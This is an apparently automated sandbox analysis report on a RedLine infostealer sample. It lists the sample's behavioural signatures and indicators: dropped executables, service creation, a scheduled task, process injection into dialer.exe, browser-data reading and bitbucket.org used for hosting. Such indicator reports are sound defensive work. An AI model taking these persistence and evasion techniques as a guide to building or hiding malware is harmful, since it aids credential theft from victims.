Malware Analysis Report

2025-01-22 09:20

Sample ID 240706-f31ktszaja
Target S500.exe
SHA256 24f095f4f5796561cc9f9c60f71a2182fee89692f239c92e7447af3461e12731
Tags
redline discovery evasion execution infostealer persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

24f095f4f5796561cc9f9c60f71a2182fee89692f239c92e7447af3461e12731

Threat Level: Known bad

The file S500.exe was found to be: Known bad.

Malicious Activity Summary

redline discovery evasion execution infostealer persistence spyware stealer

RedLine

RedLine payload

Blocklisted process makes network request

Creates new service(s)

Downloads MZ/PE file

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Enumerates connected drives

Checks installed software on the system

Power Settings

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Modifies registry class

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of UnmapMainImage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-06 05:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-06 05:24

Reported

2024-07-06 05:27

Platform

win10v2004-20240704-en

Max time kernel

150s

Max time network

146s

Command Line

winlogon.exe

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Downloads MZ/PE file

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\S500.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\RunNodeScriptAtLogon C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 532 set thread context of 400 N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe C:\Windows\system32\dialer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\safe.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\core\dist\rfc3161\error.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\classes\index.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\exponential-backoff\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\bin\qrcode-terminal.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\https-proxy-agent\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\constants.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\tiny-relative-date\translations\en-short.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-dedupe.1 C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\cli-columns\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\wcwidth\docs\index.md C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\lib\utils\open-url-prompt.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\shebang-regex\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\graceful-fs\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmversion\lib\index.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\columnify\index.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\ip-address\dist\v6\regular-expressions.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\generator\android.py C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\RGI_Emoji.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpm.ps1 C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-star.html C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\cmd-shim\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\iconv-lite\encodings\tables\shiftjis.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\minimatch\dist\cjs\assert-valid-pattern.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\MSVSNew.py C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\LICENSE-MIT C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\cmp.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\corepack\shims\npx.cmd C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\has-magic.d.ts C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\sign\dist\bundler\base.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\lib\find-visualstudio.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\lib\warning_messages.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\corepack\shims\corepack.ps1 C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-team.1 C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\fastest-levenshtein\LICENSE.md C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\is-fullwidth-code-point\index.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmpublish\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\lib\clean.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\string-width-cjs\index.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarn.ps1 C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\tuf\dist\target.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\name-from-folder\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\string.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\lib\commands\owner.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-login.1 C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\hosted-git-info\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\process.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\commonjs\has-magic.d.ts C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\core\dist\rfc3161\timestamp.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\read-cmd-shim\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\disparity-colors\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\metavuln-calculator\lib\advisory.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\shared.types.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\iconv-lite\lib\index.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-fetch\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\mode-fix.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-exec.md C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\bundle\dist\error.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\commonjs\index.d.ts C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\MSVSToolFile.py C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\lib\typos.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\string-width-cjs\license C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-unstar.md C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\e588b24.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8FCA.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9C7D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e588b28.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF629.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8EED.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{637236E9-EF59-4F9D-8269-3083C1A6C6D6} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF405.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e588b24.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8F8A.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA690.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon C:\Windows\system32\msiexec.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1720243580" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPath C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\PackageCode = "AC6AA920FB9737143A7998E5BED98A71" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductIcon = "C:\\Windows\\Installer\\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\\NodeIcon" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNode = "EnvironmentPath" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductName = "Node.js" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\corepack C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNpmModules = "EnvironmentPath" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Version = "336330754" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\PackageName = "nodejs-installer.msi" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\9E63273695FED9F4289603381C6A6C6D C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\NodeRuntime C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\71F.tmp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\npm C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\DocumentationShortcuts C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\71F.tmp\\" C:\Windows\system32\msiexec.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf0.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf0.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
